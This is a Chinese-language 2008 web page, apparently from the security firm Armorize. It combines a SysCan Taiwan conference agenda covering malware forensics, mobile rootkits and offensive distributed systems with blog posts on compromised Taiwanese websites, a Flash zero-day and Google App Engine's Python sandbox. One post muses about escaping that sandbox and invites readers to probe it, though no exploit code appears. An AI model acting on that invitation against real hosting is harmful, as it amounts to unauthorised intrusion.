當防毒軟體偵測率越來越低的情況下,使用者電腦中毒比率日益增加且無法察覺,導致重要資料被攻擊者竊取,而造成財物上的損失。此演講希望透過一些既有的工具,提供一種快速找出可疑惡意程式的方法。
|
Anti
Cyber Terrorism and Critical Information Infrastructure
Protection — Jack Yu, Armorize
反恐與國家資訊基礎建設保護(中文) |
實體國土中的人、金錢、物品與疾病進出可管制,但是面對高度網路化的資訊服務所延伸的資訊國土該如何防護?本議題將從資訊基礎建設保護來談,面對大規模網路攻擊、經濟目的或針對性攻擊相關的資訊恐怖攻擊的警訊分析,以及建構防制資訊災害應變系統的探討。
|
Crimeware
Forensics Analysis using Toolmark — 邱銘彰 (Birdman), Armorize
犯罪軟體的鑑識與工具痕分析 (中文) |
犯罪軟體(Crimeware)是指有犯罪意圖的惡意程式。近年來駭客的活動,不但越來越具規模而且更加地組織化,導致大量的個人資料外洩,也造成駭客間的地下經濟蓬勃發展。這個場次中,我們將以惡意程式鑑識角度(Malware
Forensics)分析駭客所使用的攻擊工具與後門,透過工具痕衡以了解作者的來源、意圖目的與威脅衝擊,藉此區分類出不同駭客的活動,並加以追蹤。
|
The
Powerful Evil on Mobile Phone — Nanika, COSEINC
手機上的強大邪惡 (中文) |
|
目前大多數智慧型手機還是以WinCE平台為主,並且大多數使用者並不在意安全性,或認為手機上會有漏洞或病毒。這次討論將會以最常見的Windows
Mobile 5以及Windows Mobile 6系統為主,深入探討在這個平台上需要注意哪些風險。本演講將讓大家對於手機的安全徹底改觀,開始先介紹Windows
CE核心結構後,立即詳述後門有哪些強大的功能,以及弱點在利用上有哪些技巧,如何在WinCE上發現弱點,以及何有效隱藏
rootkit等超強技術。
|
Python
Makes You Fly Safely? — Kuon, Armorize
了解 Python 的飛行安全 |
|
Python 已經在 TIOBE 程式語言調查結果中,位於前十名且不斷爬升;Google App Engine(應用程式代管服務)最先支援的程式語言就是
Python。Python 近年來大放異彩,多數應用面的安全基礎卻未見其發芽,希望藉由探討 Python Internals
來為 Python 安全研究播下種子。
|
Cooperative
offensive computing — Fyodor, Guard-Info
協同式攻擊性計算 |
|
分散式攻擊性系統(offensive
distributed systems)自1998年後就已經是地下駭客組織研究的重點。此演講將詳述可以用來組織此類系統之工具以及使用之手法。系統之骨幹為無法被監聽之傳出協定,每一個端點則負責執行一個單一任務,並將結果回報給協同系統。我們將介紹前一代系統如:Yawatt、STIF、pbounce等,並於會場首次公開由
Fydor 與 Meder 所開發之第三代協同式攻擊性計算系統。
|
Embedded
Script Attacks — Sean, TrendMicro
嵌入式 script 攻擊(中文) |
|
Script語言一直被認為只有在Web上被運用,但是實際上,在今天,許許多多的應用中都會使用嵌入式scripts(embedded
scripts),而我們也觀察到,惡意程式的製造者越來越懂得利用嵌入式script來達成攻擊。在這個演講中,我們會帶大家了解目前許多含有嵌入式script之檔案格式,這些格式如何導致隱藏之惡意script,以及偵測此種攻擊之不同技術。
|
大會場地與交通資訊
|
|
本次大會於舒適寬敞之劇院型階梯演講聽 –「台大醫院國際會議中心401室」舉辦,地址為:100台北市中正區徐州路2號。交通資訊請見:
http://www.thcc.net.tw/othstraffic.html

|
報名資訊
|
|
報名類別
|
個人
|
團體報名 (相同公司5人或5人以上)
|
學生(28歲以下)
|
|
註冊日期:六月
|
$1,500
|
$1,200 每人
|
$1,000
|
|
註冊日期:七月
|
$2,000
|
$1,600 每人
|
$1,200
|
|
現場報名
|
$2,500
|
恕不接受現場團報
|
$1,500
|
1. 活動Blog(有詳細最新資訊):http://syscantaiwan.blogspot.com
2. 大會官方網頁:http://www.syscan.org/tw/indextw.html
3. 網路報名請至:http://www.syscan.org/tw/reg_conference.html
2. 如不信任網站安全,可利用填寫報名表傳真至2-6616-1100,並電話確認,報名表如下:
姓名:
電話(手機佳):
公司:
Email:
學生:
T-shirt size:S / M / L / XL / XXL
素食:
3. 如有問題請來電或來信詢問。電:02-6616-0100
#111 林先生,email: jason.lin@armorize.com
|
|
|
Copyright.
Armorize Technologies, Inc. 2008.

|
星期六 14 六月 2008 @ 11:27 下午
GDD, Google Developer Day 2008, 此為議程.
[GAE]
早上都泡在Google App Engine(GAE) 的場次裡面, 由於之前 GAE 還在採邀請制的時候, 聽到是以 Python 作為平台支援語言, 就很感興趣, 上禮拜, 某 最壞C黑人 貼了 Interactive server-side Python shell, 乖孩子如我就這樣被帶壞, 玩了一整個晚上的 Python shell . XDDD
玩 Python Shell 之前就有查過, GAE 使用的是 Restricted Execution, 所以 Hosting 算是在某種可繼承的 safe-mode 內. 看來對 Python Internal 認知太淺, 沒辦法 escape RExec, 不然 整台 hosting 拿下 !?
各位讀者, 有興趣還可以測測看, 某些 C_EXTENSION 被拿掉了!!
此外, 在這篇也有提到, “Adding PY_COMPILED in subclasses is not recommended; an attacker could exit the restricted execution mode by putting a forged byte-compiled file (.pyc) anywhere in your file system” 這段論述在早上的GAE演講也有提到的.
我在第一個場次後提了一個問題, “How about SSL support?”, 不知道 GAE Member 是沒想過這個問題, 還是 真的誤會以為我是問 OpenSSL library …. 不過我有補充是 HTTPS, 我想他就懂了. GAE Member 的回答是 “Authentication 可以透過 SSL 連線; 而 Hosting 目前沒辦法.” 看來想要發展商業服務的 G社, 還是趕快解決 SSL 問題吧.
第二個場次講了 Data API 的設計理念之類的 …. 不是我覺得有趣的地方 …. 也不在 domain 內, 所以就半夢半醒間度過.
[雲端運算]
下午聽了葉教授的介紹, 其實和自己爬文所找到的資料差不多, 只是之前沒有老老實實聽過一個talk罷了. 主要在講 Google File System (GFS), BigTable, MapReduce, Hadoop, GAE. 其中我對於 GFS 最感興趣, 因為其中都是 Storage 和 Massive I/O 的觀念, 其實很久以前都有很多相關的研究, IEEE 或是業界的 Veritas, NetApp 都做了很多. 像是 Streaming Server, Real-time Volume, Redundant, Cache 等等, 只是G社針對 他們自己的應用做了調整; 一次/少量寫入, 大量讀取, 這類需求很常見.
BigTable & MapReduce 完全都不是我的領域, 自然是聽不懂
我對於 BigTable 怎麼樣以檔案形式儲存於 GFS 很感興趣, 不過沒有提問.
葉教授其實提到了一點, 大致上就是說 “商業解決方案授權費用過高, 且不易符合特定需求”, 很多朋友好像都只聽到前面那句, 自己從技術觀點, 反而覺得後面這句才是 ‘不能說得祕密’
GFS 為了運作平台而設計, BigTable 套疊在其上, MapReduce 又套疊在其上, 層層的 Stack, 拿去別人家的Infrastructure, 卻也不見得合適.
[Android: Dalvik VM Internals]
聽之前, 就有疑問, 為什麼要重造輪子 (JVM).
心得如下,
1) Stack-based VM 改為 Register-based VM, 減少 bytecode 在某些 loop 有關的指令數 及 bytecode 大小.
2) 擴充 JVM ISA, 減少 bytecode 在某些 array 有關的指令數
3) Interpreter 最佳化, 針對 switch condition ‘可能’產生switch table, ‘可能’ 是指要滿足最佳化條件, 則修改為強迫跳入區塊位置, 並將原本的間接位址(table), 改為使用程式碼填入以直接執行; 我有特別注意到區塊間 有 16 bytes 的限制的樣子 (也就是要對齊而且填充的程式碼不能太長啦:P ), 講師好像說沒有用完會直接jmp走還是做什麼, 這裡我沒聽清楚 @.@ # 此外, 我是覺得換在標準 JVM, 這部份不知道能不能直接用選項來強制就好, 就不用更動到 JVM 本身了.
4) Android SDK 中, 有個工具 將多個 class 重新 Bundle 成單一的 class, 其中也包含 bytecode 轉換 這其實就是 static translator; 此外還對重複使用的 constant pool 做了重定位並刪除冗餘重複的資料 # Reverse Engineering & Re-Engineering, G社果然 Hacking 阿!!!!!!!
5) No JIT compiler, 我本來想問 那我直接把 servlet 用 Dalvik VM 跑不就更好的, 結果當然是不用問了
我問了幾個問題, A) 向講師確認第4點提到的是一個 static translator; B) static translator 轉換 3rd party bytecode class 是否有版權爭議, 雖然講師認為沒有, 我是認為有:P C) static translator 是否可以轉換 obfuscated (混淆)過的 bytecode class, ex: ProGuard 處理過的, 顯然講師不像我這種玩冷門玩具的, 所以這問題就無解了, 我認為是會有相容性問題, 甚至不能處理
其實當講師在討論 Stack-based VM, 拿 bytecode 的指令一一解釋時, 我很熱血阿, Java Bytecode Reversing 很少人陪我玩呢 
此外, 其實 Dalvik VM 的一些想法, 不知道 Sun JVM 會不會借過去用呢?
以上, 如有錯誤或想法, 也請各位給建議.
P.S 好久沒發文
Kuon@chroot.org
星期一 9 六月 2008 @ 2:00 下午
這種事情報太多了
沒麼好說的 XD
數位內容產業推動辦公室被駭客佔據了!

駭客阿辣說掃到
掛的馬如下:

查了股溝說沒有, 性譽評等也說沒毒

喔咪陀佛
Birdman
星期六 7 六月 2008 @ 5:08 下午
AV廠商最害怕的不是Hacker也不是Virus… 是微軟~
(因該說是大家都怕的)
微軟出招都真狠 
這篇報導十分有趣Microsoft Patents Proactive Virus Protection
大意是說微軟有了一份專利 ‘System and method for proactive computer virus protection’ 這份專利,
狠狠的給AV廠商一擊! McAfee, Symantec, Kaspersky, 與Trend Micro等都是有類似的主動行防禦,
簡單的說就是Behavior monitor. (專利編號是7,376,970 看看有沒有專利熟的朋友幫忙研究一下)
至從Vista發表後, AV廠商已經感受到生存壓力, Vista上的核心改良已經造成Virus,Anti-Virus間的生態變化
1.病毒已經不再跟以前一樣了,以目前看來,Vista在全部安全功能啟動情況下幾乎不太需要掃毒軟體.
2.威脅漸漸轉移到Web,email,usb或是其他document形式的Exploit. 真正Virus幾乎很少看到
3.Vista上的掃毒軟體要遵循MS提供的介面, 都要聽MS的話…(在別人場子吃飯,就要照人家規矩)
4.Packer的普及…(這是掃毒軟體的永遠痛處)
因此個AV都推出了監控形式的防禦系統(HIPS)
但是,連這都被微軟控制了……….
AV廠商啊, 我看以後改賣’AV’比較好賺 (這個很有搞頭…)
Birdman
星期三 28 五月 2008 @ 1:36 下午
最近除了油價之外,大家一定要注意這一陣子的大規模掛馬事件,相信很多網管都感受到了壓力
昨天我們同仁發現到新的SWF Zero-Day Exploit也出來了, 已經用在掛馬上,用來攻擊Flash ActiveX
在securityfocus已經有報導了http://www.securityfocus.com/bid/29386
針對這些版本有效
Adobe Flash Player 9.0.124.0 (這是最新版)
Adobe Flash Player 9.0.115.0
由於目前還是0Day exploit, 所以那句老生常談 ‘軟體請更新最新版’…目前不適用 XD
Orz
目前HackAlert能夠偵測到 這個 Zero Day Exploit!

Birdman
下面為了給眼見為憑的同學看一下, 他真的會跑出其他的EXE
(錄太多廢話了,有點大,請耐心等候… XD )
read more…
星期日 18 五月 2008 @ 1:10 下午
被掛馬的網頁在

網際威信就是NoTrust公司…阿!講錯了是HiTrust
http://www.hitrust.com.tw/newsite/product.asp
…還是一家電子商務的資安公司, 是發VeriSign簽章的耶
最近爆發一批新的攻擊,已經有透過SQL Injection來活動的Worm流行了,大量的掛馬在這一陣子出現
我們的同事用公司的SmartWAF偵測到有SQL Injection活動
所以上禮拜再用HackAlert做了一些調查,剛好發現了台灣不少網站都被入侵並植入惡意程式 (順便廣告一下)
網際威信被植入大陸的惡意程式,我們監控的畫面如下

最近我真的是越來越好心了,我還有已經發信給HiTrust公司了:D
我跟他們報告了網站被入侵,不過應該是假日,所以客